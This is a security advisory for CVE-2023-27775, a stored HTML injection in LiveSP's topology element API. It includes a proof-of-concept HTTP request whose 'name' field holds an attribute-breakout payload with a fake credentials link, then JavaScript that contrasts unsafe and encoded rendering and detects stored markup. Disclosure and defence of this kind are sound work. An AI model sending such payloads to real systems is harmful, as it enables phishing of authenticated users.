CVE-2023-27775 - Stored HTML Injection

Description

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary HTML code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

POC

HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences. Generally, it can allow the attacker to modify the page content seen by the victims. The attack takes effect when the victim’s browser displays the corrupted page.

This vulnerability occurs when user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to serve a malicious HTML page to a victim. The victim's browser cannot distinguish the legitimate parts of the page from the injected ones, so it parses and executes the whole page in the victim's context.

Affected Endpoint

  • URL: https://[ip:port]/va/service/bach/topology/element
  • HTTP Post Parameter: name

Technical Details

In this specific instance, using the API available under /va/service/bach/topology/element, it is possible to inject arbitrary HTML code through the name attribute of the JSON POST body, as shown in the following HTTP Request/Response pair.

HTTP Request:

POST /va/service/bach/topology/element HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REDACTED]
Content-Type: application/json
Content-Length: 178
Origin: [REDACTED]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\"><a href=\"http://foo.com\">Insert your credentials here</a>","extraLabel":""},"type":"cluster","keyType":"cluster:area","children":{"cluster:site":[]}}

HTTP Response:

HTTP/1.1 201 Created
Server: [REDACTED]
Date: Wed, 04 Jan 2023 14:52:08 GMT
Content-Type: application/json
Content-Length: 785
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: [...]
Access-Control-Allow-Origin: *
Referrer-Policy: strict-origin

[...]

As the 201 Created response above shows, the payload was stored successfully. From that point on, whenever a user visits the https://[hostname:port]/va/cluster web page, the injected HTML is rendered in the victim's browser.
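The rendering flaw behind this advisory, shown as an added example that is not LiveSP code: an unsafe renderer that concatenates the stored name straight into markup, its hardened counterpart with context-aware encoding, and a request-body check a defender can run over stored topology elements. The JSON body is the one from the request above; the renderer markup and the assumption that element names are plain labels are this example's own.

```javascript
// Added example (not LiveSP code): the stored-HTML-injection pattern
// behind CVE-2023-27775, shown as an unsafe renderer beside a hardened one,
// plus a check that flags markup in the attributes of the JSON body.

// Constructed sample: the JSON body from the advisory's HTTP request.
const SAMPLE_BODY = JSON.stringify({
  attributes: {
    name: '"><a href="http://foo.com">Insert your credentials here</a>',
    extraLabel: '',
  },
  type: 'cluster',
  keyType: 'cluster:area',
  children: { 'cluster:site': [] },
});

// Minimal HTML entity encoding for text placed inside an element body
// or a double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern (hypothetical markup): the stored name is interpolated
// unencoded, so a value starting with `">` closes the title attribute and
// the rest of the value becomes live markup inside the page.
function renderNameUnsafe(name) {
  return `<span class="element-name" title="${name}">${name}</span>`;
}

// Hardened pattern: every interpolated value is encoded for its context,
// so the stored string can only ever appear as visible text.
function renderNameSafe(name) {
  const safe = escapeHtml(name);
  return `<span class="element-name" title="${safe}">${safe}</span>`;
}

// Defender-side check over a request body or a stored element: returns the
// attribute names whose values contain characters that can open or close
// markup. Assumes element names are plain labels (the real schema is not
// on the page).
function attributesWithMarkup(jsonBody) {
  const body = JSON.parse(jsonBody);
  const attrs = body.attributes || {};
  return Object.keys(attrs).filter((k) => /[<>"']/.test(String(attrs[k])));
}
```

Running `attributesWithMarkup` over existing topology elements is a quick way to find already-stored payloads while the output encoding fix is rolled out.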

[Screenshot: html_injection]

Reference